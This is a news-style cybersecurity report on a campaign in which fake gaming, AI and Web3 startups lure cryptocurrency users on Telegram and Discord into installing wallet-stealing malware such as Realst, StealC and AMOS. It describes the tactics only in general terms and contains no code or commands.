A sophisticated cybercrime campaign is targeting cryptocurrency users by impersonating legitimate gaming, artificial intelligence (AI), and Web3 startup companies. According to recent research from cybersecurity firm Darktrace, these threat actors are leveraging popular communication platforms such as Telegram and Discord to distribute malware.
Creation of Fake Companies
These fraudulent entities present themselves as innovative startups in the gaming, AI, and Web3 sectors. Their online presence includes professionally designed websites, detailed whitepapers, project roadmaps, and even fabricated employee profiles, all crafted to enhance credibility and lure potential victims.
Social Media Manipulation
The attackers exploit social media to amplify their reach and legitimacy. They often use compromised or counterfeit X (formerly Twitter) accounts, some of which are verified and boast large followings. These accounts are used to initiate contact with potential victims and promote the fraudulent projects.
Malicious Documentation and Communication
To further their deception, threat actors host fake project documentation on platforms such as Notion, Medium, and GitHub. Victims are then approached via direct messages on Telegram, Discord, and similar platforms, typically under the guise of discussing investment opportunities, exclusive offers, or employment.
Malware Distribution Techniques
Delivery Methods
Victims are tricked into downloading malicious software disguised as legitimate applications, such as meeting tools or crypto trading utilities. These downloads target both Windows and macOS operating systems.
Types of Malware
The campaign deploys a range of stealer malware, including Realst, StealC, AMOS, and Angel Drainer. These programs are designed to drain cryptocurrency wallets and exfiltrate sensitive personal and financial data.
Evasion Tactics
To avoid detection, the malware often utilizes stolen software signing certificates, code obfuscation, and anti-sandboxing measures, allowing it to bypass traditional security solutions.
Exploiting Telegram and Discord
Telegram
On Telegram, scammers invite users into exclusive groups and prompt them to verify their accounts using malicious bots. For example, the “OfficialSafeguardBot” injects harmful code into users’ systems, granting attackers access to private keys and cryptocurrency wallets.
Discord
A similar approach is employed on Discord, where attackers impersonate legitimate projects and distribute malware through direct messages or public channels frequented by cryptocurrency and NFT enthusiasts.
Impact and Ongoing Threat
The sophistication of these scams makes them difficult to distinguish from legitimate startups. Victims have reported substantial financial losses, in some cases amounting to millions of dollars in stolen cryptocurrency. The campaign is ongoing and continues to evolve, with threat actors adopting new themes and more advanced evasion techniques.
